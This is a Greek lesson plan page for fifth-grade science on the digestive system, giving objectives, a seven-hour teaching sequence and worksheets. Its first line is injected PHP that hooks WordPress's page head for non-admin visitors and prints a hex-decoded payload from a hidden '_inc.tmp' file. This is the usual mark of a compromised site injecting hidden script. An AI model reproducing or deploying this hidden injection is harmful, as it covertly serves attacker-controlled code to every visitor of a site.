if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } “Το ταξίδι της τροφής” ΣΕΝΑΡΙΟ ΔΙΔΑΣΚΑΛΙΑΣ |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

“Το ταξίδι της τροφής” ΣΕΝΑΡΙΟ ΔΙΔΑΣΚΑΛΙΑΣ

ΣΕΝΑΡΙΟ ΔΙΔΑΣΚΑΛΙΑΣ


 1.  ΠΑΡΟΥΣΙΑΣΗ ΣΕΝΑΡΙΟΥ

1.1. ΤΙΤΛΟΣ ΣΕΝΑΡΙΟΥ:  “Το ταξίδι της τροφής”

1.2. ΤΑΥΤΟΤΗΤΑ ΣΕΝΑΡΙΟΥ:

 Κολενδριανού Αργυρώ
Καθαροπούλου Κωνσταντίνα
Κρυσταλλόγιαννη Ελένη

 

1.3. ΓΝΩΣΤΙΚΕΣ ΠΕΡΙΟΧΕΣ: Το σενάριο αφορά το γνωστικό αντικείμενο των Φυσικών
(Ερευνώ & Ανακαλύπτω) της Ε΄ τάξης, ενότητα “ΠΕΠΤΙΚΟ ΣΥΣΤΗΜΑ”, μάθημα “Το ταξίδι
της τροφής συνεχίζεται”

 

1.4. ΣΥΜΒΑΤΟΤΗΤΑ ΜΕ ΤΟ Α.Π.Σ. ΚΑΙ ΤΟ Δ.Ε.Π.Π.Σ.:

Το σενάριο είναι απόλυτα συμβατό με το αναλυτικό πρόγραμμα σπουδών  υποχρεωτικής εκπαίδευσης (Α.Π.Σ.) και με το διαθεματικό ενιαίο πλαίσιο  προγραμμάτων σπουδών (Δ.Ε.Π.Π.Σ.) . Οι στόχοι που τίθενται άπτονται πλήρως του  Αναλυτικού Προγράμματος Φυσικών.

 

1.5. ΟΡΓΑΝΩΣΗ ΤΗΣ ΔΙΔΑΣΚΑΛΙΑΣ & ΑΠΑΙΤΟΥΜΕΝΗ ΥΛΙΚΟΤΕΧΝΙΚΗ ΥΠΟΔΟΜΗ:

ΟΡΓΑΝΩΣΗ ΔΙΔΑΣΚΑΛΙΑΣ:

Το σενάριο απευθύνεται στα δύο τμήματα της Ε΄ τάξης σε σύνολο 26 μαθητών. Θα   εργαστούν σε ομάδες των 3-4 ατόμων.

 

         ΥΛΙΚΟΤΕΧΝΙΚΗ ΥΠΟΔΟΜΗ:

Κατά την πραγματοποίηση του σεναρίου θα χρειαστούν Η/Υ και οι μαθητές θα εργαστού στην αίθουσα των υπολογιστών. Επίσης θα χρησιμοποιηθούν: διαδραστικός πίνακας, εκτυπωτής, φύλλα εργασίας και ένα μοντέλο ανθρωπίνου σώματος σε πραγματικές   διαστάσεις.

 

         ΠΡΟΑΠΑΙΤΟΥΜΕΝΕΣ ΓΝΩΣΕΙΣ:

Οι μαθητές ήδη γνωρίζουν την έννοια της ενέργειας, καθώς και το ρόλο της τροφής.
Έχουν μάθει να εργάζονται ομαδοσυνεργατικά. Τέλος, γνωρίζουν τις βασικές δεξιότητες  χρήσης του Η/Υ και είναι σε θέση ν’ ανταποκριθούν σε δραστηριότητες που θα τους ανατεθούν.

 

1.6. ΔΙΔΑΚΤΙΚΟΙ ΣΤΟΧΟΙ:

        Α. ΩΣ ΠΡΟΣ ΤΟ ΓΝΩΣΤΙΚΟ ΑΝΤΙΚΕΙΜΕΝΟ

Οι μαθητές να αναφέρουν τα όργανα του πεπτικού συστήματος και να εξηγούν τη  λειτουργία καθενός από αυτά.

Να εντοπίσουν σε τομή του ανθρωπίνου σώματος τη θέση των οργάνων αυτών.

Να διαπιστώσουν πειραματικά τη χρησιμότητα του σάλιου.

Να διαπιστώσουν πειραματικά τη χρησιμότητα της χολής.

         Β. ΩΣ ΠΡΟΣ ΤΗ ΧΡΗΣΗ ΤΩΝ ΝΕΩΝ ΤΕΧΝΟΛΟΓΙΩΝ

Να αναπτύξουν θετική στάση απέναντι στους Η/Υ.
Να αναζητούν, να αξιολογούν, να επιλέγουν και να αποθηκεύουν πληροφορίες από το   διαδίκτυο.

 

Γ. ΩΣ ΠΡΟΣ ΤΗ ΜΑΘΗΣΙΑΚΗ ΔΙΔΑΣΚΑΛΙΑ
Να παρατηρούν, να μελετούν, να συμπεραίνουν.

Να καλλιεργήσουν την αναλυτική και συνθετική ικανότητα.
Να αναπτύξουν την κριτική τους ικανότητα, τη δημιουργική τους σκέψη, τη φαντασία τους.

Να βιώσουν τη χαρά της έρευνας και της δημιουργίας.
Να τονώσουν την αυτοπεποίθησή τους, συμμετέχοντας σε ομαδικές δραστηριότητες.

 

1.7. ΕΚΤΙΜΩΜΕΝΗ ΔΙΑΡΚΕΙΑ:

Υπολογίζεται ότι απαιτούνται επτά (7) διδακτικές ώρες.

 

2. ΔΙΔΑΚΤΙΚΗ ΠΡΟΣΕΓΓΙΣΗ

 

ΘΕΩΡΗΤΙΚΗ ΠΡΟΣΕΓΓΙΣΗ: Ακολουθείται ένα μοντέλο ομαδοσυνεργατικής –  ανακαλυπτικής μεθόδου. Δίνεται έμφαση στην κριτική σκέψη, στη συνεργατική μάθηση, στη δημιουργική έκφραση. Οι μαθητές εργάζονται σε ομάδες, αξιοποιώντας τη χρήση των Τ.Ε.Π.
Οι έννοιες και οι πληροφορίες οπτικοποιούνται και εξελίσσονται. Ο μαθητής μπορεί να  αυτενεργήσει, να αναλάβει πρωτοβουλίες, να επέμβει ενεργά.

 

ΜΕΘΟΛΟΓΙΚΗ ΠΡΟΣΕΓΓΙΣΗ: Οι ομαδοσυνεργατικές διαδικασίες συντονίζονται και   καθοδηγούνται από τον εκπαιδευτικό. Ο ρόλος του είναι υποστηρικτικός και ενθαρρυντικός.
Δίνονται στους μαθητές κίνητρα ώστε να εκφράσουν τις απόψεις τους, να αξιολογήσουν τις απόψεις των συμμαθητών τους και μέσα από την ανταλλαγή τους να οικοδομήσουν τη νέα  γνώση. Ο εκπαιδευτικός δίνει σαφείς οδηγίες, έχει ετοιμάσει τα φύλλα εργασίας τωνομάδων, έχει μελετήσει τις ιστοσελίδες που θα διερευνηθούν, έχει προβλέψει τυχόν   απρόοπτα κατά την εκτέλεση του διδακτικού σεναρίου.

 

2.1. ΔΙΔΑΚΤΙΚΗ ΠΡΟΣΕΓΓΙΣΗ ΜΕ Τ.Π.Ε.

             Η χρήση των Τ.Π.Ε. οδηγεί σε σύγχρονες προσεγγίσεις μάθησης, εξελίσσοντας το παραδοσιακό διδακτικό μοντέλο. Το Διαδίκτυο αξιοποιείται, ώστε να προωθήσει τις ήδη υπάρχουσες εμπειρίες, να οδηγήσει σε επεξεργασία πληροφοριών και γνώσεων και στην   ένταξή τους στα πλαίσιο που θέτουν το σενάριο και οι μαθητές.

Το Λογισμικό παρουσίασης επιτρέπει την παρουσίαση κειμένων, εικόνων, βίντεο και ήχων.
Αποτελεί εργαλείο απλό ως προς την εκμάθηση και το χειρισμό, που επιτρέπει την ενίσχυση της γνώσης.

Ο Επεξεργαστής κειμένου, ως εργαλείο επεξεργασίας και διαχείρισης πληροφοριών,   διευκολύνει την παραγωγή γραπτού λόγου ομαδοσυνεργατικά. Οι μαθητές καταλήγουν σε   δικά τους κείμενα, καλλιεργώντας τη γλωσσική τους έκφραση.

 

 

2.2. ΤΟ ΠΡΟΤΕΙΝΟΜΕΝΟ ΣΕΝΑΡΙΟ – ΠΟΡΕΙΑ ΔΙΑΔΑΣΚΑΛΙΑΣ ΚΑΙ ΥΛΟΠΟΙΗΣΗ ΔΡΑΣΤΗΡΙΟΤΗΤΩΝ

 

              1η + 2η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Η αφόρμηση γίνεται με την παρουσίαση ψηφιακού δίσκου –   CDRom, που δείχνει την πορεία της τροφής. Κατά τη διάρκεια της προβολής γίνονται    σχολιασμοί και αποσαφηνίσεις. Στη συνέχεια, με τη βοήθεια του μοντέλου του ανθρωπίνου σώματος, φέρνουμε τα παιδιά σε επαφή με τα όργανα του πεπτικού συστήματος. Με κατάλληλες ερωτήσεις προκαλούμε συζήτηση για τη χρησιμότητα των οργάνων.

Πραγματοποιούμε τα πειράματα στο Τ.Ε. του μαθητή, που αφορούν το σάλιο και την  τροφή.

Ζητείται από τους μαθητές να καταγράψουν τη χρησιμότητα των οργάνων και το ρόλο τους στο πεπτικό σύστημα στο 1° φύλλο εργασίας.

 

             3η + 4η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Στο εργαστήριο πληροφορικής τα παιδιά αναζητούν στο
διαδίκτυο πληροφορίες και εικόνες που αφορούν το πεπτικό σύστημα. Επιλέγουν αυτές
που χρειάζονται, τις επεξεργάζονται και γράφουν ένα μικρό κείμενο, για το 2° φύλλο
εργασίας: ” Συλλέγοντας πληροφορίες για το πεπτικό σύστημα”.

 

            5η + 6η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Αφού έχουν συλλέξει πληροφορίες και εικόνες, τις παρουσιάζουν με το κατάλληλο λογισμικό παρουσιάσεων στους συμμαθητές τους. Αυτό είναι το 3° φύλλο  εργασίας:  “Δημιουργώ μια παρουσίαση για το πεπτικό σύστημα”.

 

7η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Δίνεται το 4° φύλλο εργασίας με θέμα: ” Τι έμαθα για το πεπτικό
σύστημα”.

 

2.3. ΕΠΕΚΤΑΣΗ ΔΡΑΣΤΗΡΙΟΤΗΤΑΣ – ΑΞΙΟΛΟΓΙΣΗ

 

             ΕΠΕΚΤΑΣΗ: Οι μαθητές θα μπορούσαν να επεκταθούν με άλλες δραστηριότητες:

– Δημιουργία ακροστοιχίδας για το πεπτικό σύστημα.

– Δημιουργία κολλάζ σε χαρτόνι εικόνων του ανθρωπίνου σώματος.

– Δημιουργία μοντέλου του πεπτικού συστήματος με πλαστελίνη την ώρα των Εικαστικών.

 

ΑΞΙΟΛΟΓΙΣΗ: Η αξιολόγηση γίνεται καθ’ όλη τη διάρκεια του σεναρίου. Πραγματοποιείται σε συνάρτηση με την ανάπτυξη πρωτοβουλιών και την εκτέλεσή του, τη συνεργασία στα   πλαίσια των ομάδων, την επιτυχία των στόχων που έχουν τεθεί, την αξιοποίηση των Τ.Π.Ε.,  την εποικοδομητική χρήση διαλόγου και επιχειρημάτων, την έκφραση των συναισθημάτων του μαθητή ( χαρά, ικανοποίηση, αδιαφορία, δυσκολία κ.λ.π.)

 

ΦΥΛΛΑ ΕΡΓΑΣΙΑΣ

       

            1° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ:

             “Η χρησιμότητα των οργάνων του πεπτικού συστήματος”. Οι μαθητές γράφουν στο Φ.Ε. ή στον κειμενογράφο του υπολογιστή, για τη χρησιμότητα του κάθε οργάνου του Πεπτικού Συστήματος. Κάθε ομάδα ασχολείται με ένα θέμα από τα παρακάτω:

 

“Η χρησιμότητα της στοματικής κοιλότητας και του σάλιου”

“Η χρησιμότητα του οισοφάγου”

“Η χρησιμότητα του στομάχου, των γαστρικών υγρών και του παγκρέατος”

“Η χρησιμότητα του λεπτού εντέρου”

“Η χρησιμότητα του παχέως εντέρου, του συκωτιού και της χολής¨.

 

2° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ:

“Συλλέγοντας πληροφορίες για το Πεπτικό Σύστημα”.

Η κάθε ομάδα συλλέγει πληροφορίες και εικόνες που θα βρουν στις ιστοσελίδες που θα τους δοθούν (η κάθε ομάδα για το αντικείμενό της). Με βάση τις πληροφορίες αυτές, η κάθε  ομάδα γράφει ένα μικρό κείμενο για το όργανο του πεπτικού συστήματος που έχει αναλάβει.

 

           3° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ:

          “Παρουσιάζοντας τα όργανα του Πεπτικού Συστήματος”.

 

4° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ

“Τι έμαθα για το Πεπτικό Σύστημα”

 

1. Τι ονομάζουμε Πεπτικό Σύστημα; Τι λειτουργία επιτελεί;

2.  Ποια είναι τα όργανα του Πεπτικού Συστήματος;
3. α) Ποια ουσία εκκρίνεται από τους σιελογόνους αδένες;
Ποια η χρησιμότητά της;

β)  Ποια ουσία εκκρίνεται από το συκώτι;

Ποια η χρησιμότητά της;
                         Καλή μας Όρεξη!!!